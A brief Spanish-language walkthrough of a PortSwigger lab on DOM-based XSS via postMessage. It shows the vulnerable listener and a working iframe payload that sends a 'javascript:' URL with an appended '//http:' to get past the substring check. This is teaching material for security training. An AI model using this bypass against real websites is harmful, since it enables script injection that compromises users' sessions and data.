Lab 2: DOM XSS using web messages and a JavaScript URL

https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-a-javascript-url

El aplicativo web tiene en el código HTML lo siguiente:

<script>
window.addEventListener('message', function(e) {
  var url = e.data;
  if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
    location.href = url;
  }
}, false);
</script>

Creamos un aplicativo web con el siguiente codigo:

<iframe src="https://0af400be04bea2368159757100070042.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:alert(2024)//http:','*')">

Y luego de lo anterior:

Es importante resaltar, que el script valida o busca la existencia de la siguiente palabra: http:

Si esta no se encuentra presente no se desplegara el XSS.

AnteriorLab 1: DOM XSS using web messages SiguienteLab #1: Manipulating WebSocket messages to exploit vulnerabilities

Última actualización hace 5 meses